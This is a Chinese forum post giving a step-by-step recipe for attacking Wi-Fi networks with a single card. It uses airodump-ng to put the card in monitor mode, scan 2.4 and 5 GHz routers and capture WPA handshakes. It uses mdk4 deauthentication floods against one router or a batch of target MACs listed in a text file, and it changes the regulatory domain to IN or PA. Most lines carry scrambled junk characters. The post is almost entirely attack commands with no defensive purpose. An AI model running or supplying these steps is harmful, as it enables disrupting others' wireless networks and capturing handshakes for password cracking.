少校
- 注册时间
- 2013-3-19
- 金币
- 2063 个
- 威望
- 17 个
- 荣誉
- 0 个
累计签到:107 天 连续签到:1 天 [LV.200]无线新星
|
本帖最后由 xun73tian 于 2025-3-12 16:13 编辑 ' W. }) n( u$ m& C
6 C2 t1 |8 v2 z# z S9 p* V
airodump-ng抓包步骤:单网卡1 X Q+ S" O4 D$ B6 q( u5 M# k9 N
一、终端一:选择攻击的路由
+ {- h* \3 O3 c! U. O0 Usystemctl stop NetworkManager7 K ~9 D8 o6 u/ m- M% h
airmon-ng check kill
$ |. U- r, x4 ?3 B0 l9 Z1 E3 |- Jiw reg get (查看国家监管域,默认为00)
% r) D8 l1 `! h$ oiw reg set IN (临时设置全局国家监管域为IN)# W: C6 m2 U( }- O4 P0 \/ X
或者
" i# w2 c9 A/ Liw reg set PA$ v: j$ c. {+ x7 _
8 R E1 v+ `7 d5 d( `: {1 X
iwconfig (查看无线网卡信息)7 k5 W4 P/ Q5 Y' W' A9 D9 f
airmon-ng start wlan1 (开启无线网卡监听模式)
3 V$ Q T1 z" K4 lairodump-ng wlan1 --band a (扫描5.0G的路由)
7 ^( P' L& F) Z, d; a. _: Q, u; B或者
$ s9 M5 R% O, b2 y u* Cairodump-ng wlan1 --band bg (扫描2.4G的路由)
' x- c! A' ~* ]0 |0 V- t8 Y: U* ^8 J `5 m' f; B
airodump-ng -w 包命名 -c 信道 --bssid 路由地址 wlan1( T8 A+ d0 s( q \9 x$ O+ f( u9 H
//抓取握手包,被动抓包(适应于2.4G和5.0G)
1 T2 m+ y) w9 M- Z" x; c% b4 j, ^7 S" n
二、终端二:mdk4攻击% i$ `% E) S6 U; L) h4 n7 K
mdk4 wlan1 d -B 路由地址 (攻击具体路由)
; a& w6 i8 W% Q0 ?
0 g$ P! l. I' D8 w( F. s9 t% |mdk4批量攻击路由:补充0 a/ R6 v7 u v" W1 Q+ m8 C
把要攻击的目标MAC写入到/root/1.txt文本中。
2 h' u) C9 r- ]echo 6C:B1:58:E8:0C:60 >1.txt (覆盖输入)& P. v' a3 P8 X0 J
echo 6C:B1:58:E8:0C:61 >>1.txt (追加输入)
; b3 Q K" P- M' a5 L" {mdk4 wlan1 d -b ./1.txt (可同时攻击2.4和5G) |
|